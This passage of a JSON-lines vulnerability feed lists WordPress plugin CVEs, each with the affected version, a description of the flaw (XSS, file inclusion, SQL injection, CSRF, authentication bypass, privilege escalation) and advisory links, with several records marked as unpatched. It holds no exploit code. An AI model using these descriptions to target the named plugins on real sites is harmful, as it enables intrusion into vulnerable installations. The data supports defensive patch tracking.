{"CVE_ID":"CVE-2023-2435","slug":"blog-in-blog","versionImpact":"1.1.1","description":"The Blog-in-Blog plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.1 via a shortcode attribute. This allows editor-level, and above, attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d53161ad-cc5f-4433-b288-a8095cdfd7db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d53161ad-cc5f-4433-b288-a8095cdfd7db?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L153\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-23508","slug":"pdf-poster","versionImpact":"2.1.17","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins PDF Poster \u2013 PDF Embedder Plugin for WordPress allows Reflected XSS. This issue affects PDF Poster \u2013 PDF Embedder Plugin for WordPress: from n\/a through 2.1.17.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pdf-poster\\\/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pdf-poster\\\/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1133","slug":"tutor","versionImpact":"2.6.0","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of restricted Q&A content due to a missing capability check when interacting with questions in all versions up to, and including, 2.6.0. This makes it possible for authenticated attackers, with subscriber access or higher, to interact with questions in courses in which they are not enrolled including private courses.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5473","slug":"simple-photoswipe","versionImpact":"0.1","description":"The Simple Photoswipe WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c70cfc4-5759-469a-a6a3-510c405bd28a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c70cfc4-5759-469a-a6a3-510c405bd28a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7766","slug":"adicons","versionImpact":"1.2","description":"The Adicon Server WordPress plugin through 1.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca4d629e-ab55-4e5d-80c9-fddbc9c97259\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca4d629e-ab55-4e5d-80c9-fddbc9c97259\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8870","slug":"mailchimp-wp","versionImpact":"2.5.6","description":"The Forms for Mailchimp by Optin Cat \u2013 Grow Your MailChimp List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86389489-9f9d-479b-b351-19f25166fc91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86389489-9f9d-479b-b351-19f25166fc91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-53788","slug":"uber-grid","versionImpact":"1.1.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Portfoliohub WordPress Portfolio Builder \u2013 Portfolio Gallery allows Stored XSS. This issue affects WordPress Portfolio Builder \u2013 Portfolio Gallery: from n\/a through 1.1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uber-grid\\\/vulnerability\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uber-grid\\\/vulnerability\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12288","slug":"simple-add-pages-or-posts","versionImpact":"2.0.0","description":"The Simple add pages or posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php#L243\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php#L243\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/506f101c-ffec-415d-92dc-99cb7384af95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/506f101c-ffec-415d-92dc-99cb7384af95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13220","slug":"google-map-professional","versionImpact":"1.0","description":"The WordPress Google Map Professional (Map In Your Language) WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ef27b4-e88f-46ec-9b3f-0a3e16d6f82e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ef27b4-e88f-46ec-9b3f-0a3e16d6f82e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13731","slug":"alert-box-block","versionImpact":"1.1.2","description":"The Alert Box Block \u2013 Display notice\/alerts in the front end. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Alert Box block in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alert-box-block\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alert-box-block\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d63cd13e-4a16-483f-8165-6c8090ceebab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d63cd13e-4a16-483f-8165-6c8090ceebab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4944","slug":"lastudio-element-kit","versionImpact":"1.5.2","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Compare and Google Maps widgets in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68ae8404-6dfa-4b13-b2a6-bd4554f1043f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68ae8404-6dfa-4b13-b2a6-bd4554f1043f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6934","slug":"opal-estate-pro","versionImpact":"1.7.5","description":"The Opal Estate Pro \u2013 Property Management and Submission plugin for WordPress, used by the FullHouse - Real Estate Responsive WordPress Theme, is vulnerable to privilege escalation in all versions up to, and including, 1.7.5. This is due to a lack of role restriction during registration in the 'on_regiser_user' function. This makes it possible for unauthenticated attackers to arbitrarily choose the role, including the Administrator role, assigned when registering.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/fullhouse-real-estate-responsive-wordpress-theme\\\/16179481\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/fullhouse-real-estate-responsive-wordpress-theme\\\/16179481\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7b75a4-67b4-4347-91a6-dbf98da5ceaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7b75a4-67b4-4347-91a6-dbf98da5ceaf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25040","slug":"shortcodes-ultimate","versionImpact":"5.12.6","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Vova Anokhin WordPress Shortcodes Plugin \u2014 Shortcodes Ultimate plugin <= 5.12.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/shortcodes-ultimate\\\/wordpress-shortcodes-ultimate-plugin-5-12-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/shortcodes-ultimate\\\/wordpress-shortcodes-ultimate-plugin-5-12-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22159","slug":"bulk-editor","versionImpact":"1.0.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional allows Reflected XSS. This issue affects WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional: from n\/a through 1.0.8.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1130","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.5.6","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_read() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as read.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6708","slug":"svg-support","versionImpact":"2.5.5","description":"The SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG upload feature in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping, even when the 'Sanitize SVG while uploading' feature is enabled. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that successful exploitation of this vulnerability requires the administrator to allow author-level users to upload SVG files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72bcfd2a-6803-4073-8fa9-62bcf0a10571?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72bcfd2a-6803-4073-8fa9-62bcf0a10571?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/svg-support.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/svg-support.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/functions\\\/attachment.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/functions\\\/attachment.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9933","slug":"watchtowerhq","versionImpact":"3.9.6","description":"The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value being empty and a not-empty check being missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in as the WatchTowerHQ client administrator user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50349086-e7b0-4f73-8722-1367cc05180e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50349086-e7b0-4f73-8722-1367cc05180e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watchtowerhq\\\/tags\\\/3.9.6\\\/src\\\/Password_Less_Access.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watchtowerhq\\\/tags\\\/3.9.6\\\/src\\\/Password_Less_Access.php#L56\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12458","slug":"smart-popup-blaster","versionImpact":"1.4.3","description":"The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-popup-blaster\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-popup-blaster\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13219","slug":"policy-genius","versionImpact":"2.0.4","description":"The Privacy Policy Genius WordPress plugin through 2.0.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad02238-dce1-48ce-986f-fef36b110b2d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad02238-dce1-48ce-986f-fef36b110b2d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1008","slug":"recently-purchased-products-for-woo","versionImpact":"1.1.3","description":"The Recently Purchased Products For Woo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018view\u2019 parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/recently-purchased-products-for-woo\\\/tags\\\/1.1.3\\\/includes\\\/class-rppw-public.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/recently-purchased-products-for-woo\\\/tags\\\/1.1.3\\\/includes\\\/class-rppw-public.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recently-purchased-products-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recently-purchased-products-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9ebcd32-90c1-419c-a67c-6fe41ee9fab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9ebcd32-90c1-419c-a67c-6fe41ee9fab1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13710","slug":"estatebud-properties-listings","versionImpact":"5.5.0","description":"The Estatebud \u2013 Properties & Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.0. This is due to missing or incorrect nonce validation on the 'estatebud_settings' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/estatebud-properties-listings\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/estatebud-properties-listings\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c43f4c91-329d-46b9-b2c8-f35e5baa38d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c43f4c91-329d-46b9-b2c8-f35e5baa38d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4597","slug":"woo-slider-pro-drag-drop-slider-builder-for-woocommerce","versionImpact":"1.12","description":"The Woo Slider Pro \u2013 Drag Drop Slider Builder For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the woo_slide_pro_delete_draft_preview AJAX action in all versions up to, and including, 1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-slider-pro-drag-drop-slider-builder-for-woocommerce\\\/trunk\\\/inc\\\/actions.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-slider-pro-drag-drop-slider-builder-for-woocommerce\\\/trunk\\\/inc\\\/actions.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eaee0f6-968c-4004-83e7-f79baf3ff88d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eaee0f6-968c-4004-83e7-f79baf3ff88d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1377","slug":"solidres","versionImpact":"0.9.4","description":"The Solidres WordPress plugin through 0.9.4 does not sanitise and escape numerous parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c346ff80-c16b-4219-8983-708c64fa4a61\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c346ff80-c16b-4219-8983-708c64fa4a61\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2751","slug":"resume-upload-form","versionImpact":"1.2.0","description":"The Upload Resume WordPress plugin through 1.2.0 does not validate the captcha parameter when uploading a resume via the resume_upload_form shortcode, allowing unauthenticated visitors to upload arbitrary media files to the site.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b0fe0ac-d0d1-473d-af5b-dad6217933d4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b0fe0ac-d0d1-473d-af5b-dad6217933d4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7027","slug":"post-smtp","versionImpact":"2.8.7","description":"The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018device\u2019 header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 